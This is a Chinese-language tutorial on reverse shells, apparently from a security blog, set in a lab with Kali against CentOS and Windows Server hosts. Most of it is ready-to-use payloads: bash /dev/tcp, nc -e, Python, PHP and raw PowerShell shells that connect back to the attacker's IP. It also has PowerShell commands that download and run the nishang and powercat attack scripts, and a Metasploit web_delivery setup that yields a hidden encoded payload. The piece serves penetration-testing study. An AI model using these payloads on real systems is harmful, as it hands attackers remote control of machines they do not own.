什么是反弹shell？

通常我们对一个开启了80端口的服务器进行访问时，就会建立起与服务器Web服务链接，从而获取到服务器相应的Web服务。而反弹shell是我们开启一个端口进行监听，转而让服务器主动反弹一个shell来连接我们的主机，我们再通过接收到的shell进而来远程控制服务器。

什么是Netcat？为什么选择Netcat?

Netcat由于他体积小且功能强大的特性，常常使用者被称为“瑞士军刀”或者ncat，在Debian、Mac系统中是默认安装的。想要在两台机器之间进行正向、反向连接，Netcat通常是不二之选，反弹shell的使用中常用参数包括：

• -e filename 程序重定向

• -l 监听接收信息

• -n 以数字形式表示的IP地址

• -p port 本地端口

• -u UDP模式

• -v 显示详细信息 （-vv能显示更加详细的消息）

关于Netcatd的更多使用方法可参考：

https://www.freebuf.com/sectool/168661.html

Linux系统中常见的反弹shell

实验环境：

Kali:192.168.178.131

CentOS 7:192.168.178.218

方法一：利用Linux命令

#反弹命令：

bash -i >/dev/tcp/192.168.178.131/23333 0>&1 2>&1

在系统文件中是不存在/dev/tcp这个文件的，它是一个特殊文件，打开这个文件就类似于发出了一个socket调用，建立一个socket连接，读写这个文件就相当于在这个socket连接中传输数据。同理/dev/udp就是通过udp来进行传输。

#Kali进行监听：

nc -lvp 23333

方法二：利用nc命令

#反弹命令：

nc -e /bin/bash 192.168.178.131 23333

(利用了nc的重定向功能)

#Kali进行监听：

nc -lvp 23333

方法三：利用脚本

1. Python

#反弹命令：

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.178.131',23333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

#Kali进行监听：

nc -lvp 23333

2. php

(前提：需要在php.ini中放开危险函数system,exec。可以通过php --ini来查询php配置文件路径，然后删除配置文件中“disable_funtions”变量中对应的函数名即可。)

(1) 反弹命令(代码假设TCP连接的文件描述符为4，如果不行可以换成5或6)：

php -r '$sock=fsockopen("192.168.178.131",23333);system("/bin/bash -i <&4 >&4 2>&4");'

#Kali进行监听：

nc -lvp 23333

(2) 反弹命令：

php -r ‘exec(“/bin/bash -i >& /dev/tcp/192.168.178.131/23333”);’

#Kali进行监听：

nc -lvp 23333

Windows系统常见反弹命令

实验环境：

Kali:192.168.178.131

Windows server 2008:192.168.178.128

方法一：利用”nishang”攻击框架

Nishang(https://github.com/samratashok/nishang )是一个基于PowerShell的攻击框架，集合了一些PowerShell攻击脚本和有效载荷，可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。

1. 利用UDP反弹命令：

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.178.131 -port 23333

#Kali进行监听：

nc -lup 23333

2. 利用TCP反弹命令：

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.178.131 -port 23333

#Kali进行监听：

nc -lvp 23333

方法二：利用powercat

powercat（https://github.com/besimorhino/powercat）为Powershell版的Netcat，实际上是一个powershell的函数，使用方法类似Netcat。

#反弹命令：

powershell IEX (New-Object System.Net.Webclient).DownloadString ('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.178.131 -p 23333 -e cmd

#Kali进行监听：

nc -lvp 23333

方法三：自定义powershell函数

#反弹命令：

powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('192.168.178.131',23333);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

#Kali进行监听：

nc -lvp 23333

方法四：利用metasploit

利用metasploit的web_delivery模块可通过python、php、powershell、regsvr32等进行反弹shell。

#以powershell进行反弹为例，kali执行命令，可以看到生成已经过编码的payload：

msfconsole

use exploit/multi/script/web_delivery

set payload windows/meterpreter/reverse_tcp

set target 2

set LPORT 23333

set LHOST 192.168.178.131

Set srvhost 0.0.0.0

Set srvpost 8080

run

#Win server 2008执行生成的命令“powershell.exe -nop -w hidden -e ......”（-w hidden参数使命令运行时窗口隐藏）。

#Kali接收到反弹：

以上提到的是常见的反弹shell方式，当然，还存在更多的其他方式，github上也有很多成熟的攻击框架可以实现反弹shell,例如PowerSploit、Empire、Dnscat等等，感兴趣可以继续进行深入学习。